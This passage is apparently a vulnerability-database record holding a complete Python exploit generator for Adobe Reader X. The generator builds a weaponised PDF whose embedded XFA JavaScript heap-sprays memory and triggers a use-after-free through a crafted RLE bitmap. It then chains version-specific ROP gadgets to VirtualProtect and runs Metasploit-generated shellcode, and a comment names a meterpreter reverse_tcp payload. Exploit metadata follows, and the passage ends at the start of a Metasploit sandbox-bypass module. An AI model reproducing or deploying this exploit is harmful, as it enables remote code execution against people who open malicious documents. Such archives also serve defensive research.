PDFObject.__init__(self)\r\n self.obj=[obj]\r\n def __str__(self):\r\n if len(self.obj)==0:\r\n return \"null\"\r\n return \"%d %d R\"%(self.obj[0].n,self.obj[0].v)\r\n\r\n## PDF REference 3rd edition:: 3.3 Filters\r\n## Example Filter...\r\nclass FlateDecode:\r\n name = PDFName('FlateDecode')\r\n def __init__(self):\r\n pass\r\n def encode(self,stream):\r\n return zlib.compress(stream)\r\n def decode(self,stream):\r\n return zlib.decompress(stream)\r\n\r\n## PDF REference 3rd edition:: 3.4 File Structure\r\n## Simplest file structure...\r\nclass PDFDoc():\r\n def __init__(self,obfuscate=0):\r\n self.objs=[]\r\n self.info=None\r\n self.root=None\r\n def setRoot(self,root):\r\n self.root=root\r\n def setInfo(self,info):\r\n self.info=info\r\n def _add(self,obj):\r\n if obj.v!=None or obj.n!=None:\r\n raise Exception(\"Already added!!!\")\r\n obj.v=0\r\n obj.n=1+len(self.objs)\r\n self.objs.append(obj)\r\n def add(self,obj):\r\n if type(obj) != type([]):\r\n self._add(obj); \r\n else:\r\n for o in obj: \r\n self._add(o)\r\n def _header(self):\r\n return \"%PDF-1.5\\n%\\xE7\\xF3\\xCF\\xD3\\n\"\r\n def __str__(self):\r\n doc1 = self._header()\r\n xref = {}\r\n for obj in self.objs:\r\n xref[obj.n] = len(doc1)\r\n doc1+=\"%d %d obj\\n\"%(obj.n,obj.v)\r\n doc1+=obj.__str__()\r\n doc1+=\"\\nendobj\\n\" \r\n posxref=len(doc1)\r\n doc1+=\"xref\\n\"\r\n doc1+=\"0 %d\\n\"%(len(self.objs)+1)\r\n doc1+=\"0000000000 65535 f \\n\"\r\n for xr in xref.keys():\r\n doc1+= \"%010d %05d n \\n\"%(xref[xr],0)\r\n doc1+=\"trailer\\n\"\r\n trailer = PDFDict()\r\n trailer.add(\"Size\",len(self.objs)+1)\r\n if self.root == None:\r\n raise Exception(\"Root not set!\")\r\n trailer.add(\"Root\",PDFRef(self.root))\r\n if self.info:\r\n trailer.add(\"Info\",PDFRef(self.info))\r\n doc1+=trailer.__str__()\r\n doc1+=\"\\nstartxref\\n%d\\n\"%posxref\r\n doc1+=\"%%EOF\"\r\n return doc1\r\n######### End of miniPDF\r\n\r\nSLIDESIZE=0x12C\r\n\r\ndef mkBMP(payload, exception=True):\r\n bmp = ''\r\n #getInfoHeader\r\n bfType = 0x4d42\r\n assert bfType in [0x4d42,0x4349,0x5043,0x4943,0x5043] #0x4142: not supp\r\n bmp += struct.pack('<H', bfType)\r\n\r\n bfSize = 0\r\n bfOffBits = 0\r\n bmp += struct.pack('<L', bfSize)\r\n bmp += struct.pack('<H', 0) #Reserved1\r\n bmp += struct.pack('<H', 0) #Reserved2\r\n bmp += struct.pack('<L', bfOffBits)\r\n\r\n\r\n biSize = 0x40\r\n assert not biSize in [0x12]\r\n bmp += struct.pack('<L', biSize)\r\n\r\n\r\n biHeight = 1\r\n biWidth = SLIDESIZE #size of texture structure LFH enabled\r\n biPlanes = 1\r\n biBitCount = 8\r\n biCompression = 1\r\n biSizeImage = 0\r\n biXPelsPerMeter = 0\r\n biYPelsPerMeter = 0\r\n biClrUsed = 2\r\n if biClrUsed >0xff:\r\n raise \"BUG!!!!\"\r\n\r\n biClrImportant = 0\r\n bmp += struct.pack('<L', biWidth)\r\n bmp += struct.pack('<L', biHeight)\r\n bmp += struct.pack('<H', biPlanes)\r\n bmp += struct.pack('<H', biBitCount)\r\n bmp += struct.pack('<L', biCompression)\r\n bmp += struct.pack('<L', biSizeImage)\r\n bmp += struct.pack('<L', biXPelsPerMeter)\r\n bmp += struct.pack('<L', biYPelsPerMeter)\r\n bmp += struct.pack('<L', biClrUsed)\r\n bmp += struct.pack('<L', biClrImportant)\r\n bmp += 'A'*(biSize-0x40) #pad\r\n\r\n numColors=biClrUsed\r\n if biClrUsed == 0 or biBitCount < 8:\r\n numColors = 1<<biBitCount;\r\n\r\n bmp += 'RGBA'*(numColors) #pallete\r\n\r\n bmp += '\\x00\\x02\\xff\\x00' * ((0xffffffff-0xff) / 0xff) \r\n\r\n #while (len(bmp)+10)%0x400 != 0:\r\n # bmp += '\\x00\\x02\\x00\\x00'\r\n\r\n assert len(payload) < 0x100 and len(payload) >= 3\r\n\r\n\r\n bmp += '\\x00\\x02'+chr(0x100-len(payload))+'\\x00' \r\n bmp += '\\x00'+chr(len(payload))+payload\r\n\r\n if len(payload)&1 :\r\n bmp += 'P'\r\n\r\n if exception:\r\n bmp += '\\x00\\x02\\x00\\xff'*10 #getting the pointer outside the texture so it triggers an exception\r\n bmp += '\\x00'+chr(10)+'X'*10\r\n else:\r\n bmp += '\\x00\\x01'\r\n #'\\x04X'*(biWidth+2000)+\"\\x00\\x02\"\r\n return bmp\r\n\r\ndef UEncode(s):\r\n r = ''\r\n s += '\\x00'*(len(s)%2)\r\n for i in range(0,len(s),2):\r\n r+= '\\\\u%04x'%(struct.unpack('<H', (s[i:i+2]))[0])\r\n return r\r\n r = ''\r\n for c in s:\r\n r+= '%%%02x'%ord(c)\r\n return r\r\n\r\n\r\ndef mkXFAPDF(shellcode = '\\x90'*0x400+'\\xcc'):\r\n xdp = '''\r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\" timeStamp=\"2012-11-23T13:41:54Z\" uuid=\"0aa46f9b-2c50-42d4-ab0b-1a1015321da7\">\r\n<template xmlns:xfa=\"http://www.xfa.org/schema/xfa-template/3.1/\" xmlns=\"http://www.xfa.org/schema/xfa-template/3.0/\">\r\n <?formServer defaultPDFRenderFormat acrobat9.1static?>\r\n <?formServer allowRenderCaching 0?>\r\n <?formServer formModel both?>\r\n <subform name=\"form1\" layout=\"tb\" locale=\"en_US\" restoreState=\"auto\">\r\n <pageSet>\r\n <pageArea name=\"Page1\" id=\"Page1\">\r\n <contentArea x=\"0.25in\" y=\"0.25in\" w=\"576pt\" h=\"756pt\"/>\r\n <medium stock=\"default\" short=\"612pt\" long=\"792pt\"/>\r\n <?templateDesigner expand 1?>\r\n </pageArea>\r\n <?templateDesigner expand 1?>\r\n </pageSet>\r\n <variables>\r\n <script name=\"util\" contentType=\"application/x-javascript\">\r\n // Convenience functions to pack and unpack litle endian an utf-16 strings\r\n function pack(i){\r\n var low = (i & 0xffff);\r\n var high = ((i>>16) & 0xffff);\r\n return String.fromCharCode(low)+String.fromCharCode(high);\r\n }\r\n function unpackAt(s, pos){\r\n return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16);\r\n }\r\n function packs(s){\r\n result = \"\";\r\n for (i=0;i<s.length;i+=2)\r\n result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8));\r\n return result;\r\n }\r\n function packh(s){\r\n return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16));\r\n }\r\n function packhs(s){\r\n result = \"\";\r\n for (i=0;i<s.length;i+=4)\r\n result += packh(s.slice(i,i+4));\r\n return result;\r\n }\r\n var verbose = 1;\r\n function message(x){\r\n if (util.verbose == 1 )\r\n xfa.host.messageBox(x);\r\n }\r\n\r\n//ROP0\r\n//7201E63D XCHG EAX,ESP\r\n//7201E63E RETN\r\n//ROP1\r\n//7200100A JMP DWORD PTR DS:[KERNEL32.GetModuleHandle]\r\n//ROP2\r\n//7238EF5C PUSH EAX\r\n//7238EF5D CALL DWORD PTR DS:[KERNEL32.GetProcAddress]\r\n//7238EF63 TEST EAX,EAX\r\n//7238EF65 JNE SHORT 7238EF84\r\n//7238EF84 POP EBP\r\n//7238EF85 RETN 4\r\n//ROP3\r\n//72001186 JMP EAX ; kernel32.VirtualProtect\r\n//ROP4\r\n//72242491 ADD ESP,70\r\n//72242494 RETN\r\n\r\n\r\n var _offsets = {'Reader\": { \"10.104\": {\r\n \"acrord32\": 0xA4, \r\n \"rop0\": 0x1E63D,\r\n \"rop1\": 0x100A,\r\n \"rop2\": 0x38EF5C,\r\n \"rop3\": 0x1186,\r\n \"rop4\": 0x242491,\r\n },\r\n \"10.105\": { // Added by Eddie Mitchell\r\n \"acrord32\": 0xA5,\r\n \"rop0\": 0x1E52D,\r\n \"rop1\": 0x100A,\r\n \"rop2\": 0x393526,\r\n \"rop3\": 0x1186,\r\n \"rop4\": 0x245E71, \r\n },\r\n \"10.106\": { // Added by Eddie Mitchell\r\n \"acrord32\": 0xA5,\r\n \"rop0\": 0x1E52D,\r\n \"rop1\": 0x100A,\r\n \"rop2\": 0x393526,\r\n \"rop3\": 0x1186,\r\n \"rop4\": 0x245E71, \r\n },\r\n }, \r\n \"Exchange-Pro\": {\r\n \"10.105\": { // Added by Eddie Mitchell\r\n \"acrobat\": 0xCD,\r\n \"rop0\": 0x3720D,\r\n \"rop1\": 0x100A,\r\n \"rop2\": 0x3DCC91,\r\n \"rop3\": 0x180F,\r\n \"rop4\": 0x25F2A1, \r\n },\r\n },\r\n };\r\n\r\n function offset(x){\r\n //app.viewerType will be \"Reader\" for Reader, \r\n //\"Exchange\" for Acrobat Standard or \"Exchange-Pro\" for Acrobat Pro\r\n try {\r\n return _offsets[app.viewerType][app.viewerVersion][x];\r\n }\r\n catch (e) {\r\n xfa.host.messageBox(\"Type:\" +app.viewerType+ \" Version: \"+app.viewerVersion+\" NOT SUPPORTED!\");\r\n }\r\n return 0x41414141;\r\n }\r\n\r\n </script>\r\n <script name=\"spray\" contentType=\"application/x-javascript\">\r\n // Global variable for spraying \r\n var slide_size=%%SLIDESIZE%%;\r\n var size = 200;\r\n var chunkx = \"%%MINICHUNKX%%\";\r\n var x = new Array(size);\r\n var y = new Array(size);\r\n var z = new Array(size);\r\n var pointers = new Array(100);\r\n var done = 0;\r\n </script>\r\n <?templateDesigner expand 1?>\r\n </variables>\r\n <subform w=\"576pt\" h=\"756pt\">\r\n \r\n <field name=\"ImageCrash\">\r\n <ui> <imageEdit/> </ui>\r\n <value>\r\n <image aspect=\"actual\" contentType=\"image/jpeg\">%%BMPFREELFH%%</image>\r\n </value>\r\n </field>\r\n </subform>\r\n <event activity=\"initialize\" name=\"event__initialize\">\r\n <script contentType=\"application/x-javascript\">\r\n // This script runs at the very beginning and \r\n // is used to prepare the memory layout \r\n util.message(\"Initialize\");\r\n var i; var j;\r\n if (spray.done == 0){\r\n //Trigger LFH use\r\n var TOKEN = \"\\u5858\\u5858\\u5678\\u1234\";\r\n var chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2);\r\n\r\n for (i=0; i < spray.size; i+=1)\r\n spray.x[i] = TOKEN + util.pack(i) + \r\n spray.chunkx.substring(0, chunk_len) + \r\n util.pack(i) + \"\";\r\n\r\n util.message(\"Initial spray done!\");\r\n for (j=0; j < size; j++)\r\n for (i=spray.size-1; i > spray.size/4; i-=10)\r\n spray.x[i]=null;\r\n\r\n spray.done = 1;\r\n util.message(\"Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\");\r\n }\r\n // After this the form layout is rendered and the bug triggered \r\n </script>\r\n </event>\r\n <event activity=\"docReady\" ref=\"$host\" name=\"event__docReady\">\r\n <script contentType=\"application/x-javascript\">\r\n // This script runs once the page is ready \r\n util.message(\"DocReady\");\r\n var i; var j;\r\n var found = -1; // Index of the overlapped string\r\n var acro = 0; // Base of the AcroRd32_dll\r\n\r\n // Search over all strings for the first one with the broken TOKEN \r\n for (i=0; i < spray.size; i+=1)\r\n if ((spray.x[i]!=null) && (spray.x[i][0] != \"\\u5858\")){\r\n found = i;\r\n acro = (( util.unpackAt(spray.x[i], 14) >> 16) - util.offset(\"acrord32\")) << 16;\r\n util.message(\"Found! String number \"+ found + \" has been corrupted acrord32.dll:\" + acro.toString(16) );\r\n break;\r\n }\r\n // Behaviour is mostly undefined if not found \r\n if (found == -1){\r\n util.message(\"Corrupted String NOT Found!\");\r\n event.target.closeDoc(true);\r\n }\r\n\r\n // Corrupted string was found let's generates the new \r\n // string for overlapping the struct before freeing it\r\n var chunky = \"\";\r\n for (i=0; i < 7; i+=1)\r\n chunky += util.pack(0x41414141);\r\n chunky += util.pack(0x10101000); \r\n while (chunky.length < spray.slide_size/2)\r\n chunky += util.pack(0x58585858);\r\n\r\n // Free the overlapping string \r\n util.message(\"Feeing corrupted string! Previous string will we used-free (\"+(found)+\")\");\r\n for (j=0; j < 100000; j++)\r\n spray.x[found-1]=spray.x[found]=null;\r\n\r\n // Trigger several allocs that will fall over the structure\r\n for (i=0; i < 200; i+=1){\r\n ID = \"\" + i;\r\n spray.y[i] = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ \"\";\r\n }\r\n util.message(\"Allocated 20 chunks-y\\\\n\"); \r\n\r\n // Heap spraying make's baby jesus cry!\r\n // Construct the 0x1000 small chunk for spraying \r\n var obj = 0x10101000;\r\n var pointer_slide = \"\"; \r\n pointer_slide += util.pack(acro+util.offset(\"rop4\")); //add esp,70;ret\r\n for (i=0; i < 27; i+=1)\r\n pointer_slide += util.pack(0x41414141);\r\n obj += pointer_slide.length*2;\r\n // ROP\r\n pointer_slide += util.pack(acro+util.offset(\"rop0\")); //XCHG EAX,ESP;ret\r\n pointer_slide += util.pack(acro+util.offset(\"rop1\")); //0x100A jmp getmodule\r\n pointer_slide += util.pack(acro+util.offset(\"rop2\")); //@0x04 - getProcAddress\r\n pointer_slide += util.pack(obj+0xDC); //@0x08 point to KERNEL32\r\n //@0x10\r\n pointer_slide += util.pack(obj+0xCC);\r\n pointer_slide += util.pack(0x43434343); // POPPED TO EBP \r\n pointer_slide += util.pack(acro+util.offset(\"rop3\")); // JMP EAX\r\n pointer_slide += util.pack(obj); //Points to offset 0 of this\r\n //@0x20\r\n pointer_slide += util.pack(obj+0x38);\r\n pointer_slide += util.pack(obj+0x38);\r\n pointer_slide += util.pack(0x1000); //SIZE_T dwSize,\r\n pointer_slide += util.pack(0x40); // DWORD flNewProtect,\r\n //0x30\r\n pointer_slide += util.pack(obj+0x34); //PDWORD lpflOldProtect\r\n pointer_slide += util.pack(0x00000000); //DWORD OldProtect\r\n pointer_slide += util.packhs(\"E9B1000000909090\");\r\n //0x40\r\n pointer_slide += util.pack(acro); //Used by next stage\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n //0x50\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n //0x60\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n //0x70\r\n pointer_slide += util.pack(acro);\r\n pointer_slide += util.pack(0x48484848);\r\n pointer_slide += util.pack(0x49494949);\r\n pointer_slide += util.pack(0x49494949);\r\n\r\n //0x80\r\n pointer_slide += util.pack(0x49494949);\r\n pointer_slide += util.pack(0x50505050);\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n //0x90\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n //0xa0\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n //0xb0\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n //0xc0\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0x46464646);\r\n pointer_slide += util.pack(0xCCCCCCCC);\r\n pointer_slide += util.packs(\"VirtualProtect\"); //@0xCC\r\n pointer_slide += \"\\u0000\";\r\n pointer_slide += \"KERNEL32\";\r\n pointer_slide += \"\\u0000\";\r\n pointer_slide += \"%%SHELLCODE%%\";\r\n while (pointer_slide.length < 0x1000/2)\r\n pointer_slide += util.pack(0x41414141);\r\n pointer_slide = pointer_slide.substring(0,0x1000/2);\r\n util.message(\"Pointer slide size: \" + pointer_slide.length);\r\n\r\n // And now ensure it gets bigger than 0x100000 bytes\r\n while (pointer_slide.length < 0x100000/2)\r\n pointer_slide += pointer_slide;\r\n // And the actual spray \r\n for (i=0; i < 100; i+=1)\r\n spray.pointers[i] = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + \"\";\r\n\r\n // Everything done here close the doc and \r\n // trigger the use of the vtable\r\n util.message(\"Now what?\");\r\n var pdfDoc = event.target;\r\n pdfDoc.closeDoc(true);\r\n\r\n </script>\r\n </event>\r\n </subform>\r\n <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?>\r\n <?templateDesigner DefaultLanguage JavaScript?>\r\n <?templateDesigner DefaultRunAt client?>\r\n <?acrobat JavaScript strictScoping?>\r\n <?PDFPrintOptions embedViewerPrefs 0?>\r\n <?PDFPrintOptions embedPrintOnFormOpen 0?>\r\n <?PDFPrintOptions scalingPrefs 0?>\r\n <?PDFPrintOptions enforceScalingPrefs 0?>\r\n <?PDFPrintOptions paperSource 0?>\r\n <?PDFPrintOptions duplexMode 0?>\r\n <?templateDesigner DefaultPreviewType interactive?>\r\n <?templateDesigner DefaultPreviewPagination simplex?>\r\n <?templateDesigner XDPPreviewFormat 19?>\r\n <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>\r\n <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>\r\n <?templateDesigner Zoom 119?>\r\n <?templateDesigner FormTargetVersion 30?>\r\n <?templateDesigner SaveTaggedPDF 1?>\r\n <?templateDesigner SavePDFWithEmbeddedFonts 1?>\r\n <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>\r\n<config xmlns=\"http://www.xfa.org/schema/xci/3.0/\">\r\n <agent name=\"designer\">\r\n \r\n <destination>pdf</destination>\r\n <pdf>\r\n \r\n <fontInfo/>\r\n </pdf>\r\n </agent>\r\n <present>\r\n \r\n <pdf>\r\n \r\n <version>1.7</version>\r\n <adobeExtensionLevel>5</adobeExtensionLevel>\r\n </pdf>\r\n <common/>\r\n <xdp>\r\n <packets>*</packets>\r\n </xdp>\r\n </present>\r\n</config>\r\n<localeSet xmlns=\"http://www.xfa.org/schema/xfa-locale-set/2.7/\">\r\n <locale name=\"en_US\" desc=\"English (United States)\">\r\n <calendarSymbols name=\"gregorian\">\r\n <monthNames>\r\n <month>January</month>\r\n <month>February</month>\r\n <month>March</month>\r\n <month>April</month>\r\n <month>May</month>\r\n <month>June</month>\r\n <month>July</month>\r\n <month>August</month>\r\n <month>September</month>\r\n <month>October</month>\r\n <month>November</month>\r\n <month>December</month>\r\n </monthNames>\r\n <monthNames abbr=\"1\">\r\n <month>Jan</month>\r\n <month>Feb</month>\r\n <month>Mar</month>\r\n <month>Apr</month>\r\n <month>May</month>\r\n <month>Jun</month>\r\n <month>Jul</month>\r\n <month>Aug</month>\r\n <month>Sep</month>\r\n <month>Oct</month>\r\n <month>Nov</month>\r\n <month>Dec</month>\r\n </monthNames>\r\n <dayNames>\r\n <day>Sunday</day>\r\n <day>Monday</day>\r\n <day>Tuesday</day>\r\n <day>Wednesday</day>\r\n <day>Thursday</day>\r\n <day>Friday</day>\r\n <day>Saturday</day>\r\n </dayNames>\r\n <dayNames abbr=\"1\">\r\n <day>Sun</day>\r\n <day>Mon</day>\r\n <day>Tue</day>\r\n <day>Wed</day>\r\n <day>Thu</day>\r\n <day>Fri</day>\r\n <day>Sat</day>\r\n </dayNames>\r\n <meridiemNames>\r\n <meridiem>AM</meridiem>\r\n <meridiem>PM</meridiem>\r\n </meridiemNames>\r\n <eraNames>\r\n <era>BC</era>\r\n <era>AD</era>\r\n </eraNames>\r\n </calendarSymbols>\r\n <datePatterns>\r\n <datePattern name=\"full\">EEEE, MMMM D, YYYY</datePattern>\r\n <datePattern name=\"long\">MMMM D, YYYY</datePattern>\r\n <datePattern name=\"med\">MMM D, YYYY</datePattern>\r\n <datePattern name=\"short\">M/D/YY</datePattern>\r\n </datePatterns>\r\n <timePatterns>\r\n <timePattern name=\"full\">h:MM:SS A Z</timePattern>\r\n <timePattern name=\"long\">h:MM:SS A Z</timePattern>\r\n <timePattern name=\"med\">h:MM:SS A</timePattern>\r\n <timePattern name=\"short\">h:MM A</timePattern>\r\n </timePatterns>\r\n <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols>\r\n <numberPatterns>\r\n <numberPattern name=\"numeric\">z,zz9.zzz</numberPattern>\r\n <numberPattern name=\"currency\">$z,zz9.99|($z,zz9.99)</numberPattern>\r\n <numberPattern name=\"percent\">z,zz9%</numberPattern>\r\n </numberPatterns>\r\n <numberSymbols>\r\n <numberSymbol name=\"decimal\">.</numberSymbol>\r\n <numberSymbol name=\"grouping\">,</numberSymbol>\r\n <numberSymbol name=\"percent\">%</numberSymbol>\r\n <numberSymbol name=\"minus\">-</numberSymbol>\r\n <numberSymbol name=\"zero\">0</numberSymbol>\r\n </numberSymbols>\r\n <currencySymbols>\r\n <currencySymbol name=\"symbol\">$</currencySymbol>\r\n <currencySymbol name=\"isoname\">USD</currencySymbol>\r\n <currencySymbol name=\"decimal\">.</currencySymbol>\r\n </currencySymbols>\r\n <typefaces>\r\n <typeface name=\"Myriad Pro\"/>\r\n <typeface name=\"Minion Pro\"/>\r\n <typeface name=\"Courier Std\"/>\r\n <typeface name=\"Adobe Pi Std\"/>\r\n <typeface name=\"Adobe Hebrew\"/>\r\n <typeface name=\"Adobe Arabic\"/>\r\n <typeface name=\"Adobe Thai\"/>\r\n <typeface name=\"Kozuka Gothic Pro-VI M\"/>\r\n <typeface name=\"Kozuka Mincho Pro-VI R\"/>\r\n <typeface name=\"Adobe Ming Std L\"/>\r\n <typeface name=\"Adobe Song Std L\"/>\r\n <typeface name=\"Adobe Myungjo Std M\"/>\r\n </typefaces>\r\n </locale>\r\n <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet>\r\n<xfa:datasets xmlns:xfa=\"http://www.xfa.org/schema/xfa-data/1.0/\">\r\n <xfa:data xfa:dataNode=\"dataGroup\"/>\r\n</xfa:datasets>\r\n<x:xmpmeta xmlns:x=\"adobe:ns:meta/\" x:xmptk=\"Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 \">\r\n <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\">\r\n <rdf:Description xmlns:xmp=\"http://ns.adobe.com/xap/1.0/\" rdf:about=\"\">\r\n <xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate>\r\n <xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool>\r\n <xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate>\r\n <xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate>\r\n </rdf:Description>\r\n <rdf:Description xmlns:pdf=\"http://ns.adobe.com/pdf/1.3/\" rdf:about=\"\">\r\n <pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer>\r\n </rdf:Description>\r\n <rdf:Description xmlns:xmpMM=\"http://ns.adobe.com/xap/1.0/mm/\" rdf:about=\"\">\r\n <xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID>\r\n <xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID>\r\n </rdf:Description>\r\n <rdf:Description xmlns:dc=\"http://purl.org/dc/elements/1.1/\" rdf:about=\"\">\r\n <dc:format>application/pdf</dc:format>\r\n </rdf:Description>\r\n </rdf:RDF>\r\n</x:xmpmeta>\r\n<xfdf xmlns=\"http://ns.adobe.com/xfdf/\" xml:space=\"preserve\">\r\n <annots/>\r\n</xfdf></xdp:xdp>\r\n '''\r\n assert len(shellcode) <= 0xF00, \"You need a smaller shellcode, sorry\"\r\n\r\n #shellcode\r\n xdp = xdp.replace(\"%%SHELLCODE%%\",UEncode(shellcode))\r\n xdp = xdp.replace(\"%%SLIDESIZE%%\", \"0x%x\"%SLIDESIZE);\r\n xdp = xdp.replace(\"%%MINICHUNKX%%\",UEncode('O'*SLIDESIZE))\r\n xdp = xdp.replace(\"%%BMPFREELFH%%\",mkBMP('\\x01\\x00\\x00\\x00\\x00\\x00'+ chr(0x27)+'\\x05',True).encode('base64'))\r\n #xdp = xdp.replace(\"%%BMPFREELFH%%\",file(\"/usr/share/pixmaps/gnome-news.png\",\"rb\").read().encode('base64'))\r\n\r\n file(\"%s.log\"%sys.argv[0].split('.')[0],'wb').write(xdp)\r\n #The document\r\n doc = PDFDoc()\r\n \r\n #font\r\n font = PDFDict()\r\n font.add(\"Name\", PDFName(\"F1\"))\r\n font.add(\"Subtype\", PDFName(\"Type1\"))\r\n font.add(\"BaseFont\", PDFName(\"Helvetica\"))\r\n\r\n #name:font map\r\n fontname = PDFDict()\r\n fontname.add(\"F1\",font)\r\n\r\n #resources\r\n resources = PDFDict()\r\n resources.add(\"Font\",fontname)\r\n \r\n #contents\r\n contentsDict = PDFDict()\r\n contents= PDFStream(contentsDict, '''BT \r\n /F1 24 Tf \r\n 100 100 Td \r\n (Pedefe Pedefeito Pedefeon!) Tj \r\n ET''')\r\n \r\n #page\r\n page = PDFDict()\r\n page.add(\"Type\",PDFName(\"Page\"))\r\n page.add(\"Resources\",resources)\r\n page.add(\"Contents\", PDFRef(contents))\r\n\r\n #pages\r\n pages = PDFDict()\r\n pages.add(\"Type\", PDFName(\"Pages\"))\r\n pages.add(\"Kids\", PDFArray([PDFRef(page)]))\r\n pages.add(\"Count\", PDFNum(1))\r\n\r\n #add parent reference in page\r\n page.add(\"Parent\",PDFRef(pages))\r\n\r\n xfa = PDFStream(PDFDict(), xdp)\r\n xfa.appendFilter(FlateDecode())\r\n doc.add(xfa)\r\n\r\n #form\r\n form = PDFDict()\r\n form.add(\"XFA\", PDFRef(xfa))\r\n doc.add(form)\r\n\r\n #shellcode2\r\n shellcode2 = PDFStream(PDFDict(), struct.pack(\"<L\",0xcac0face)+\"\\xcc\"*10)\r\n doc.add(shellcode2)\r\n\r\n #catalog\r\n catalog = PDFDict()\r\n catalog.add(\"Type\", PDFName(\"Catalog\"))\r\n catalog.add(\"Pages\", PDFRef(pages))\r\n catalog.add(\"NeedsRendering\", \"true\")\r\n catalog.add(\"AcroForm\", PDFRef(form))\r\n\r\n\r\n adbe = PDFDict()\r\n adbe.add(\"BaseVersion\",\"/1.7\")\r\n adbe.add(\"ExtensionLevel\",PDFNum(3))\r\n\r\n extensions = PDFDict()\r\n extensions.add(\"ADBE\", adbe)\r\n\r\n catalog.add(\"Extensions\",extensions)\r\n doc.add([catalog,pages,page,contents])\r\n doc.setRoot(catalog)\r\n\r\n\r\n #render it\r\n return doc.__str__()\r\n\r\n\r\nif __name__ == '__main__':\r\n import optparse,os\r\n from subprocess import Popen, PIPE\r\n parser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit')\r\n parser.add_option('--debug', action='store_true', default=False, help='For debugging')\r\n parser.add_option('--msfpayload', metavar='MSFPAYLOAD', default=\"windows/messagebox \", help=\"Metasploit payload. Ex. 'win32_exec CMD=calc'\")\r\n parser.add_option('--payload', metavar='PAYLOAD', default=None)\r\n parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation')\r\n (options, args) = parser.parse_args()\r\n \r\n if options.doc:\r\n print __doc__\r\n os.exit(-1)\r\n\r\n if options.debug:\r\n print mkXFAPDF(),\r\n os.exit(-1)\r\n if options.payload == None:\r\n #\"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R\"\r\n msfpayload = Popen(\"msfpayload4.4 %s R\"%options.msfpayload, shell=True, stdout=PIPE)\r\n shellcode = msfpayload.communicate()[0]\r\n else:\r\n shellcode = file(options.payload, \"rb\").read() #options.hexpayload.decode('hex')\r\n print mkXFAPDF(shellcode),", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/26703/"}, {"lastseen": "2016-02-03T02:01:44", "bulletinFamily": "exploit", "description": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass. CVE-2013-2730. Local exploit for windows platform", "modified": "2013-05-26T00:00:00", "published": "2013-05-26T00:00:00", "id": "EDB-ID:25725", "href": "https://www.exploit-db.com/exploits/25725/", "type": "exploitdb", "title": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Registry\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Adobe Reader X Sandbox. The\r\n vulnerability is due to a sandbox rule allowing a Low 